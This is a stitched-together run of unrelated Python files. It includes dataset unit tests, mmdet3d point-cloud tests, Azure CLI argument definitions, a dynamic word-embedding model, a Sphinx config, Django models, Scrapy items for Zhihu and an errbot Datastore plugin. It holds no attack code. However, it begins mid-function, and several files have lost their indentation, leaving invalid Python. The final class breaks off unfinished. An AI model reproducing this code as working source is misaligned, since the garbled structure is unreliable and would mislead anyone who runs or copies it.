    rawf = h5py.File("tests/data/raw.h5", "r")["WtLoop_nominal"]
raww = rawf["weight_nominal"]
rawm = rawf["met"]
np.testing.assert_array_almost_equal(raww, inds.weights, 5)
np.testing.assert_array_almost_equal(rawm, inds.df.met, 5)
def test_scale_weight_sum():
ds1 = from_root(["tests/data/test_file.root"], name="myds", branches=branches)
ds2 = from_root(["tests/data/test_file.root"], name="ds2", branches=branches)
ds2.weights = np.random.randn(len(ds1)) * 10
scale_weight_sum(ds1, ds2)
testval = abs(1.0 - ds2.weights.sum() / ds1.weights.sum())
assert testval < 1.0e-4
def test_cleanup():
os.remove("outfile.h5")
assert True
def test_columnkeeping():
ds1 = from_root(
["tests/data/test_file.root"],
name="myds",
branches=["met", "sumet", "pT_jet2", "reg2j2b"],
auxweights=["pT_lep1", "pT_lep2", "pT_jet1"],
)
keep_c = ["reg2j2b", "pT_jet2"]
keep_w = ["pT_lep1", "pT_jet1"]
ds1.keep_columns(keep_c)
ds1.keep_weights(keep_w)
list_of_col = list(ds1.df.columns)
list_of_exw = list(ds1.auxweights.columns)
assert keep_c == list_of_col
assert keep_w == list_of_exw
def test_columnrming():
ds1 = from_root(
["tests/data/test_file.root"],
name="myds",
branches=["met", "sumet", "pT_jet2", "reg2j2b"],
auxweights=["pT_lep1", "pT_lep2", "pT_jet1"],
)
ds1.rm_columns(["met", "sumet"])
list_of_cols = list(ds1.df.columns)
assert len(list_of_cols) == 2 and "pT_jet2" in list_of_cols and "reg2j2b" in list_of_cols
ds1 = from_root(["tests/data/test_file.root"], name="myds")
list_of_cols = list(ds1.df.columns)
assert "OS" in list_of_cols
assert "SS" in list_of_cols
assert "elmu" in list_of_cols
assert "elel" in list_of_cols
assert "mumu" in list_of_cols
list_of_regs = [reg for reg in list_of_cols if "reg" in reg]
ds1.rm_chargeflavor_columns()
ds1.rm_region_columns()
ds1.rm_weight_columns()
list_of_cols_after = list(ds1.df.columns)
assert "OS" not in list_of_cols_after
assert "SS" not in list_of_cols_after
assert "elmu" not in list_of_cols_after
assert "mumu" not in list_of_cols_after
assert "elel" not in list_of_cols_after
assert "reg1j1b" not in list_of_cols_after
for r in list_of_regs:
assert r not in list_of_cols_after
def test_selected_datasets():
ds2 = from_root(
"tests/data/test_file.root", auxweights=["pT_lep1", "pT_lep2", "pT_jet1"], name="myds"
)
splits = ds2.selected_datasets(
{"s1": "(pT_lep2 > 30) & (pT_jet1 < 50)", "s2": "(reg2j1b==True)"}
)
t = uproot.open("tests/data/test_file.root")["WtLoop_nominal"]
pT_lep2_g30 = t.array("pT_lep2") > 30
pT_jet1_l50 = t.array("pT_jet1") < 50
reg2j1b_ist = t.array("reg2j1b") == True
pT_lep1 = t.array("pT_lep1")
s1_pT_lep1 = splits["s1"].df.pT_lep1.to_numpy()
s2_pT_lep1 = splits["s2"].df.pT_lep1.to_numpy()
pT_lep1_manual_s1 = pT_lep1[pT_lep2_g30 & pT_jet1_l50]
pT_lep1_manual_s2 = pT_lep1[reg2j1b_ist]
np.testing.assert_allclose(s1_pT_lep1, pT_lep1_manual_s1)
np.testing.assert_allclose(s2_pT_lep1, pT_lep1_manual_s2)
def test_selection_masks():
ds2 = from_root(
"tests/data/test_file.root",
auxweights=["pT_lep1", "pT_lep2", "pT_jet1"],
name="myds",
)
masks, sels = ds2.selection_masks(
{"s1": "(pT_lep2 > 30) & (pT_jet1 < 50)", "s2": "(reg2j1b==True)"}
)
t = uproot.open("tests/data/test_file.root")["WtLoop_nominal"]
pT_lep2_g30 = t.array("pT_lep2") > 30
pT_jet1_l50 = t.array("pT_jet1") < 50
reg2j1b_ist = t.array("reg2j1b") == True
pT_lep1 = t.array("pT_lep1")
s1_pT_lep1 = ds2[masks["s1"]].df.pT_lep1.to_numpy()
s2_pT_lep1 = ds2[masks["s2"]].df.pT_lep1.to_numpy()
pT_lep1_manual_s1 = pT_lep1[pT_lep2_g30 & pT_jet1_l50]
pT_lep1_manual_s2 = pT_lep1[reg2j1b_ist]
np.testing.assert_allclose(s1_pT_lep1, pT_lep1_manual_s1)
np.testing.assert_allclose(s2_pT_lep1, pT_lep1_manual_s2)
|
# Copyright (c) OpenMMLab. All rights reserved.
import numpy as np
import pytest
import torch
def test_dgcnn_gf_module():
if not torch.cuda.is_available():
pytest.skip()
from mmdet3d.ops import DGCNNGFModule
self = DGCNNGFModule(
mlp_channels=[18, 64, 64],
num_sample=20,
knn_mod='D-KNN',
radius=None,
norm_cfg=dict(type='BN2d'),
act_cfg=dict(type='ReLU'),
pool_mod='max').cuda()
assert self.mlps[0].layer0.conv.in_channels == 18
assert self.mlps[0].layer0.conv.out_channels == 64
xyz = np.fromfile('tests/data/sunrgbd/points/000001.bin', np.float32)
# (B, N, C)
xyz = torch.from_numpy(xyz).view(1, -1, 3).cuda()
points = xyz.repeat([1, 1, 3])
# test forward
new_points = self(points)
assert new_points.shape == torch.Size([1, 200, 64])
# test F-KNN mod
self = DGCNNGFModule(
mlp_channels=[6, 64, 64],
num_sample=20,
knn_mod='F-KNN',
radius=None,
norm_cfg=dict(type='BN2d'),
act_cfg=dict(type='ReLU'),
pool_mod='max').cuda()
# test forward
new_points = self(xyz)
assert new_points.shape == torch.Size([1, 200, 64])
# test ball query
self = DGCNNGFModule(
mlp_channels=[6, 64, 64],
num_sample=20,
knn_mod='F-KNN',
radius=0.2,
norm_cfg=dict(type='BN2d'),
act_cfg=dict(type='ReLU'),
pool_mod='max').cuda()
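    # construction-only check: the ball-query (radius-based) grouping path is
    # exercised by __init__; forward passes are covered by the KNN cases above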
def test_dgcnn_fa_module():
if not torch.cuda.is_available():
pytest.skip()
from mmdet3d.ops import DGCNNFAModule
self = DGCNNFAModule(mlp_channels=[24, 16]).cuda()
assert self.mlps.layer0.conv.in_channels == 24
assert self.mlps.layer0.conv.out_channels == 16
points = [torch.rand(1, 200, 12).float().cuda() for _ in range(3)]
fa_points = self(points)
assert fa_points.shape == torch.Size([1, 200, 40])
def test_dgcnn_fp_module():
if not torch.cuda.is_available():
pytest.skip()
from mmdet3d.ops import DGCNNFPModule
self = DGCNNFPModule(mlp_channels=[24, 16]).cuda()
assert self.mlps.layer0.conv.in_channels == 24
assert self.mlps.layer0.conv.out_channels == 16
xyz = np.fromfile('tests/data/sunrgbd/points/000001.bin',
np.float32).reshape((-1, 6))
# (B, N, 3)
xyz = torch.from_numpy(xyz).view(1, -1, 3).cuda()
points = xyz.repeat([1, 1, 8]).cuda()
fp_points = self(points)
assert fp_points.shape == torch.Size([1, 200, 16])
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from knack.arguments import CLIArgumentType
from azure.cli.core.commands.parameters import get_enum_type
from ._validators import validate_include_or_exclude, validate_ids_or_resource_group
def load_arguments(self, _):
ids_arg_type = CLIArgumentType(nargs='+', options_list=['--ids'],
help='One or more resource IDs (space delimited). If provided, no other '
'"Resource Id" arguments should be specified.')
with self.argument_context('advisor recommendation list') as c:
c.argument('ids', ids_arg_type, validator=validate_ids_or_resource_group)
c.argument('category', options_list=['--category', '-c'], help='Name of recommendation category.',
arg_type=get_enum_type(['Cost', 'HighAvailability', 'Performance', 'Security']))
with self.argument_context('advisor recommendation disable') as c:
c.argument('ids', ids_arg_type)
c.argument('days', options_list=['--days', '-d'], type=int,
help='Number of days to disable. If not specified, the recommendation is disabled forever.')
with self.argument_context('advisor recommendation enable') as c:
c.argument('ids', ids_arg_type)
with self.argument_context('advisor configuration set') as c:
c.argument('low_cpu_threshold', options_list=['--low-cpu-threshold', '-l'],
help='Value for low CPU threshold.', arg_type=get_enum_type(['5', '10', '15', '20']))
c.argument('exclude', options_list=['--exclude', '-e'], action='store_true',
help='Exclude from recommendation generation.')
c.argument('include', options_list=['--include', '-i'], action='store_true',
help='Include in recommendation generation.', validator=validate_include_or_exclude)
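# Illustrative invocations that the argument registrations above support
# (resource IDs and values are placeholders):
#   az advisor recommendation list --category Cost
#   az advisor recommendation disable --ids <resource-id> --days 7
#   az advisor configuration set --low-cpu-threshold 10 --exclude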
|
"""Contains embedding model implementation"""
import numpy as np
import torch
import torch.nn as nn
from torch.distributions.categorical import Categorical
class DynamicBernoulliEmbeddingModel(nn.Module):
def __init__(
self,
V,
T,
m_t,
dictionary,
sampling_distribution,
k=50,
lambda_=1e4,
lambda_0=1,
ns=20,
):
"""
Parameters
----------
V : int
Vocabulary size.
T : int
Number of timesteps.
m_t : dict
The total number of tokens in each timestep to compute the scaling factor
for the pseudo log likelihoods.
dictionary : dict
Maps word to index.
sampling_distribution : tensor (V,)
The unigram distribution to use for negative sampling.
k : int
Embedding dimension.
        lambda_ : float
            Scaling factor on the time drift prior.
        lambda_0 : float
            Scaling factor on the embedding priors.
ns : int
Number of negative samples.
"""
super().__init__()
self.V = V # Vocab size.
        self.T = T  # Number of timesteps.
self.k = k # Embedding dimension.
self.total_tokens = sum(m_t.values()) # Used for scaling factor for pseudo LL
self.lambda_ = lambda_ # Scaling factor on the time drift prior.
self.lambda_0 = lambda_0 # Scaling factor on the embedding priors.
self.sampling_distribution = Categorical(logits=sampling_distribution)
self.negative_samples = ns # Number of negative samples.
self.dictionary = dictionary
self.dictionary_reverse = {v: k for k, v in dictionary.items()}
# Embeddings parameters.
self.rho = nn.Embedding(V * T, k) # Stacked dynamic embeddings
self.alpha = nn.Embedding(V, k) # Time independent context embeddings
with torch.no_grad():
nn.init.normal_(self.rho.weight, 0, 0.01)
nn.init.normal_(self.alpha.weight, 0, 0.01)
# Transformations
self.log_sigmoid = nn.LogSigmoid()
self.sigmoid = nn.Sigmoid()
def L_pos(self, eta):
return self.log_sigmoid(eta).sum()
def L_neg(self, batch_size, times, contexts_summed):
neg_samples = self.sampling_distribution.sample(
torch.Size([batch_size, self.negative_samples])
)
neg_samples = neg_samples + (times * self.V).reshape((-1, 1))
neg_samples = neg_samples.T.flatten()
context_flat = contexts_summed.repeat((self.negative_samples, 1))
eta_neg = (self.rho(neg_samples) * context_flat).sum(axis=1)
return (torch.log(1 - self.sigmoid(eta_neg) + 1e-7)).sum()
def forward(self, targets, times, contexts, validate=False, dynamic=True):
"""Forward pass of the model
Parameters
----------
targets : (batch_size,)
times : (batch_size,)
contexts : (batch_size, 2 * context_size)
dynamic : bool
Indicates whether to include the drift component of the loss.
Returns
-------
loss
L_pos
L_neg
L_prior
"""
batch_size = targets.shape[0]
# Since the embeddings are stacked, adjust the indices for the targets.
# In other words, word `i` in time slice `j` would be at position
# `j * V + i` in the embedding matrix where V is the vocab size.
targets_adjusted = times * self.V + targets
# -1 indicates out of bounds for the context word, so mask these out so
# they don't contribute to the context sum.
context_mask = contexts == -1
contexts[context_mask] = 0
contexts = self.alpha(contexts)
contexts[context_mask] = 0
contexts_summed = contexts.sum(axis=1)
eta = (self.rho(targets_adjusted) * contexts_summed).sum(axis=1)
# Loss
loss, L_pos, L_neg, L_prior = None, None, None, None
L_pos = self.L_pos(eta)
if not validate:
L_neg = self.L_neg(batch_size, times, contexts_summed)
loss = (self.total_tokens / batch_size) * (L_pos + L_neg)
L_prior = -self.lambda_0 / 2 * (self.alpha.weight ** 2).sum()
L_prior += -self.lambda_0 / 2 * (self.rho.weight[0] ** 2).sum()
if dynamic:
rho_trans = self.rho.weight.reshape((self.T, self.V, self.k))
L_prior += (
-self.lambda_ / 2 * ((rho_trans[1:] - rho_trans[:-1]) ** 2).sum()
)
loss += L_prior
loss = -loss
return loss, L_pos, L_neg, L_prior
def get_embeddings(self):
"""Gets trained embeddings and reshapes them into (T, V, k)"""
embeddings = (
self.rho.cpu()
.weight.data.reshape((self.T, len(self.dictionary), self.k))
.numpy()
)
return embeddings
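# Minimal smoke-test sketch (illustrative only): the vocabulary size, timestep
# count, token counts, and batch tensors below are made up; a real pipeline
# would build them from a corpus, padding missing context slots with -1.
if __name__ == "__main__":
    V, T = 100, 3
    m_t = {t: 1000 for t in range(T)}
    dictionary = {"w%d" % i: i for i in range(V)}
    model = DynamicBernoulliEmbeddingModel(
        V, T, m_t, dictionary, sampling_distribution=torch.ones(V))
    targets = torch.randint(0, V, (8,))
    times = torch.randint(0, T, (8,))
    contexts = torch.randint(-1, V, (8, 4))  # -1 marks out-of-bounds slots
    loss, L_pos, L_neg, L_prior = model(targets, times, contexts)
    loss.backward()
    print(model.get_embeddings().shape)  # expected: (3, 100, 50)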
|
# -*- coding: utf-8 -*-
#
# Ayame documentation build configuration file, created by
# sphinx-quickstart on Tue Feb 03 21:49:06 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.abspath('..'))
import ayame
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.intersphinx']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'Ayame'
copyright = '2011-2015, Akinori Hattori'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = ayame.__version__.split('+', 1)[0]
# The full version, including alpha/beta/rc tags.
release = ayame.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = '{} {}'.format(project, version)
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'ayame'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'ayame.tex', 'Ayame Documentation',
'Akinori Hattori', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'ayame', 'Ayame Documentation',
['Akinori Hattori'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'ayame', 'Ayame Documentation',
'Akinori Hattori', 'Ayame', 'An Apache Wicket-like component based WSGI framework',
'Web development'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
'python': ('https://docs.python.org/', None),
}
|
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
# Copyright 2015 and onwards Google, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from nemo_text_processing.text_normalization.graph_utils import (
NEMO_CHAR,
NEMO_DIGIT,
GraphFst,
delete_space,
insert_space,
)
try:
import pynini
from pynini.lib import pynutil
PYNINI_AVAILABLE = True
except (ModuleNotFoundError, ImportError):
PYNINI_AVAILABLE = False
class TimeFst(GraphFst):
"""
Finite state transducer for verbalizing time, e.g.
time { hours: "12" minutes: "30" } -> 12:30
time { hours: "1" minutes: "12" } -> 01:12
time { hours: "2" suffix: "a.m." } -> 02:00 a.m.
"""
def __init__(self):
super().__init__(name="time", kind="verbalize")
add_leading_zero_to_double_digit = (NEMO_DIGIT + NEMO_DIGIT) | (pynutil.insert("0") + NEMO_DIGIT)
hour = (
pynutil.delete("hours:")
+ delete_space
+ pynutil.delete("\"")
+ pynini.closure(NEMO_DIGIT, 1)
+ pynutil.delete("\"")
)
minute = (
pynutil.delete("minutes:")
+ delete_space
+ pynutil.delete("\"")
+ pynini.closure(NEMO_DIGIT, 1)
+ pynutil.delete("\"")
)
suffix = (
delete_space
+ insert_space
+ pynutil.delete("suffix:")
+ delete_space
+ pynutil.delete("\"")
+ pynini.closure(NEMO_CHAR - " ", 1)
+ pynutil.delete("\"")
)
optional_suffix = pynini.closure(suffix, 0, 1)
zone = (
delete_space
+ insert_space
+ pynutil.delete("zone:")
+ delete_space
+ pynutil.delete("\"")
+ pynini.closure(NEMO_CHAR - " ", 1)
+ pynutil.delete("\"")
)
optional_zone = pynini.closure(zone, 0, 1)
graph = (
hour @ add_leading_zero_to_double_digit
+ delete_space
+ pynutil.insert(":")
+ (minute @ add_leading_zero_to_double_digit)
+ optional_suffix
+ optional_zone
)
delete_tokens = self.delete_tokens(graph)
self.fst = delete_tokens.optimize()
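# Illustrative usage sketch (kept as comments since pynini may be absent;
# token spacing follows the docstring examples above):
#   fst = TimeFst().fst
#   out = pynini.shortestpath('time { hours: "12" minutes: "30" }' @ fst)
#   print(out.string())  # expected: 12:30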
|
from django.db import models
from django.contrib.auth.models import AbstractUser
from datetime import datetime
class CustomUser(AbstractUser):
phoneNumber = models.CharField(blank=True, max_length=255)
    color = models.CharField(
        'color', blank=True, max_length=9, default=r"#ffffffff")  # e.g. "#ff123456"
    gender_choices = (
        ('male', 'Male'),
        ('female', 'Female')
    )
    nick_name = models.CharField('nickname', max_length=50, default='')
    birthday = models.DateField('birthday', null=True, blank=True)
    gender = models.CharField(
        'gender', max_length=10, choices=gender_choices, default='female')
    adress = models.CharField('address', max_length=100, default='')
    mobile = models.CharField('mobile number', max_length=11, null=True, blank=True)
    image = models.ImageField(upload_to='image/%Y%m',
                              default='image/default.png', max_length=100)
    def __str__(self):
        return self.username + " (email: " + self.email + ")"
    class Meta:
        db_table = 'users'
        verbose_name = 'user info'
        verbose_name_plural = verbose_name
class EmailVerifyRecord(models.Model):
    send_choices = (
        ('register', 'Register'),
        ('forget', 'Reset password'),
        ('update_email', 'Change email')
    )
    code = models.CharField('verification code', max_length=20)
    email = models.EmailField('email', max_length=50)
    send_type = models.CharField(choices=send_choices, max_length=30)
    send_time = models.DateTimeField(default=datetime.now)
    class Meta:
        verbose_name = 'email verification code'
        verbose_name_plural = verbose_name
class Banner(models.Model):
    title = models.CharField('title', max_length=100)
    image = models.ImageField('carousel image', upload_to='banner/%Y%m', max_length=100)
    url = models.URLField('URL', max_length=200)
    index = models.IntegerField('display order', default=100)
    add_time = models.DateTimeField('added at', default=datetime.now)
    class Meta:
        verbose_name = 'carousel banner'
        verbose_name_plural = verbose_name
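# Illustrative usage (e.g. from a registration view; `make_code` is a
# hypothetical helper that generates a random code string):
#   EmailVerifyRecord.objects.create(
#       code=make_code(), email=user.email, send_type='register')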
|
import datetime
import scrapy
from itemloaders.processors import MapCompose
from w3lib.html import remove_tags
from mtianyanSpider.items import MysqlItem, ElasticSearchItem
from mtianyanSpider.settings import SQL_DATETIME_FORMAT
from mtianyanSpider.sites.zhihu.es_zhihu import ZhiHuQuestionIndex, ZhiHuAnswerIndex
from mtianyanSpider.utils.common import extract_num, extract_num_include_dot, real_time_count
from mtianyanSpider.utils.string_util import exclude_none
ZHIHU_QUESTION_COUNT_INIT = 0
ZHIHU_ANSWER_COUNT_INIT = 0
class ZhihuQuestionItem(scrapy.Item, MysqlItem, ElasticSearchItem):
url_object_id = scrapy.Field()
question_id = scrapy.Field()
title = scrapy.Field()
content = scrapy.Field(
input_processor=MapCompose(exclude_none),
)
topics = scrapy.Field()
answer_num = scrapy.Field()
comments_num = scrapy.Field()
watch_user_num = scrapy.Field()
click_num = scrapy.Field()
url = scrapy.Field()
crawl_time = scrapy.Field()
def clean_data(self):
self["question_id"] = self["question_id"][0]
self["topics"] = ",".join(self["topics"])
self["url"] = self["url"][0]
self["title"] = "".join(self["title"])
try:
self["content"] = "".join(self["content"])
self["content"] = remove_tags(self["content"])
except BaseException:
self["content"] = "无"
try:
self["answer_num"] = extract_num("".join(self["answer_num"]))
except BaseException:
self["answer_num"] = 0
self["comments_num"] = extract_num("".join(self["comments_num"]))
if len(self["watch_user_num"]) == 2:
watch_user_num_click = self["watch_user_num"]
self["watch_user_num"] = extract_num_include_dot(watch_user_num_click[0])
self["click_num"] = extract_num_include_dot(watch_user_num_click[1])
else:
watch_user_num_click = self["watch_user_num"]
self["watch_user_num"] = extract_num_include_dot(watch_user_num_click[0])
self["click_num"] = 0
self["crawl_time"] = datetime.datetime.now().strftime(SQL_DATETIME_FORMAT)
def save_to_mysql(self):
        # SQL statement to insert into the zhihu_question table
insert_sql = """
insert into zhihu_question(url_object_id,question_id, title, content,topics,
answer_num, comments_num,watch_user_num, click_num, url,
crawl_time
)
VALUES (%s, %s, %s, %s, %s
, %s, %s, %s, %s, %s,
%s)
ON DUPLICATE KEY UPDATE
content=VALUES(content), answer_num=VALUES(answer_num), comments_num=VALUES(comments_num),
watch_user_num=VALUES(watch_user_num), click_num=VALUES(click_num)
"""
self.clean_data()
sql_params = (
self['url_object_id'], self["question_id"], self["title"], self["content"], self["topics"],
self["answer_num"], self["comments_num"], self["watch_user_num"], self["click_num"], self['url'],
self["crawl_time"])
return insert_sql, sql_params
def save_to_es(self):
self.clean_data()
zhihu = ZhiHuQuestionIndex()
zhihu.meta.id = self["url_object_id"]
zhihu.question_id = self["question_id"]
zhihu.title = self["title"]
zhihu.content = self["content"]
zhihu.topics = self["topics"]
zhihu.answer_num = self["answer_num"]
zhihu.comments_num = self["comments_num"]
zhihu.watch_user_num = self["watch_user_num"]
zhihu.click_num = self["click_num"]
zhihu.url = self["url"]
zhihu.title_keyword = self["title"]
zhihu.crawl_time = self["crawl_time"]
real_time_count('zhihu_question_count', ZHIHU_QUESTION_COUNT_INIT)
zhihu.save()
def help_fields(self):
for field in self.fields:
print(field, "= scrapy.Field()")
class ZhihuAnswerItem(scrapy.Item, MysqlItem, ElasticSearchItem):
url_object_id = scrapy.Field()
answer_id = scrapy.Field()
question_id = scrapy.Field()
author_id = scrapy.Field()
author_name = scrapy.Field()
content = scrapy.Field()
praise_num = scrapy.Field()
comments_num = scrapy.Field()
url = scrapy.Field()
create_time = scrapy.Field()
update_time = scrapy.Field()
crawl_time = scrapy.Field()
def clean_data(self):
try:
self["praise_num"] = extract_num("".join(self["praise_num"]))
except BaseException:
self["praise_num"] = 0
self["comments_num"] = extract_num("".join(self["comments_num"]))
self["create_time"] = datetime.datetime.fromtimestamp(
self["create_time"]).strftime(SQL_DATETIME_FORMAT)
try:
self["update_time"] = datetime.datetime.fromtimestamp(
self["update_time"]).strftime(SQL_DATETIME_FORMAT)
        except BaseException:
self["update_time"] = self["create_time"]
self["crawl_time"] = self["crawl_time"].strftime(SQL_DATETIME_FORMAT)
self["content"] = remove_tags(self["content"])
def save_to_mysql(self):
self.clean_data()
        # SQL statement to insert into the zhihu_answer table
insert_sql = """
insert into zhihu_answer(url_object_id, answer_id, question_id, author_id, author_name,
content, praise_num, comments_num,url,create_time,
update_time, crawl_time)
VALUES (%s, %s, %s, %s, %s,
%s, %s, %s, %s, %s,
%s, %s)
ON DUPLICATE KEY UPDATE
content=VALUES(content), comments_num=VALUES(comments_num), praise_num=VALUES(praise_num),
update_time=VALUES(update_time), author_name=VALUES(author_name)
"""
sql_params = (
self["url_object_id"], self["answer_id"], self["question_id"], self["author_id"], self["author_name"],
self["content"], self["praise_num"], self["comments_num"], self["url"], self["create_time"],
self["update_time"], self["crawl_time"]
)
return insert_sql, sql_params
def save_to_es(self):
self.clean_data()
zhihu = ZhiHuAnswerIndex()
zhihu.meta.id = self["url_object_id"]
zhihu.answer_id = self["answer_id"]
zhihu.question_id = self["question_id"]
zhihu.author_id = self["author_id"]
zhihu.author_name = self["author_name"]
zhihu.content = self["content"]
zhihu.praise_num = self["praise_num"]
zhihu.comments_num = self["comments_num"]
zhihu.url = self["url"]
zhihu.create_time = self["create_time"]
zhihu.update_time = self["update_time"]
zhihu.crawl_time = self["crawl_time"]
real_time_count("zhihu_answer_count", ZHIHU_QUESTION_COUNT_INIT)
zhihu.save()
def help_fields(self):
        for field in self.fields:
print(field, "= scrapy.Field()")
|
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
import datetime
import logging
from typing import Any
import os
from jsonpickle import encode, decode
from errbot.storage.base import StorageBase, StoragePluginBase
from gcloud import datastore
log = logging.getLogger('errbot.storage.gcd')
ACCOUNT_FILE_ENTRY = 'accountfile'
PROJECT_ENTRY = 'project'
NAMESPACE_ENTRY = 'namespace'
DEFAULT_NAMESPACE = 'Errbot'  # Datastore namespace, not an Errbot namespace
class CloudDatastore(StorageBase):
def __init__(self, namespace, kind, project, credentials):
        log.debug('Trying to authenticate Google Cloud Datastore on %s with %s', project, credentials)
self.ds = datastore.Client.from_service_account_json(credentials, project=project, namespace=namespace)
log.debug('API built %s', self.ds)
self.kind = kind
def _gkey(self, key):
return self.ds.key(self.kind, key)
def _get_all(self):
query = self.ds.query(kind=self.kind)
return list(query.fetch())
def get(self, key: str) -> Any:
resp = self.ds.get(self._gkey(key))
if not resp:
raise KeyError("%s doesn't exist." % key)
return decode(resp['value'])
def remove(self, key: str):
        self.ds.delete(self._gkey(key))
def set(self, key: str, value: Any) -> None:
ent = datastore.Entity(key=self._gkey(key), exclude_from_indexes=['value'])
ent['value'] = encode(value)
self.ds.put(ent)
def len(self):
return len(self._get_all()) # TODO: optimize
def keys(self):
return [ent.key.name for ent in self._get_all()]
def close(self) -> None:
pass
class CloudDataStorePlugin(StoragePluginBase):
def __init__(self, bot_config):
super().__init__(bot_config)
if PROJECT_ENTRY not in self._storage_config:
raise Exception('You need to specify a project in your config.py like this: STORAGE_CONFIG={"project":"albator"}')
        self.credentials = self._storage_config.get(ACCOUNT_FILE_ENTRY, os.path.join(bot_config.BOT_DATA_DIR, 'servacc.json'))
self.prj = self._storage_config[PROJECT_ENTRY]
        self.ds_namespace = self._storage_config.get(NAMESPACE_ENTRY, DEFAULT_NAMESPACE)
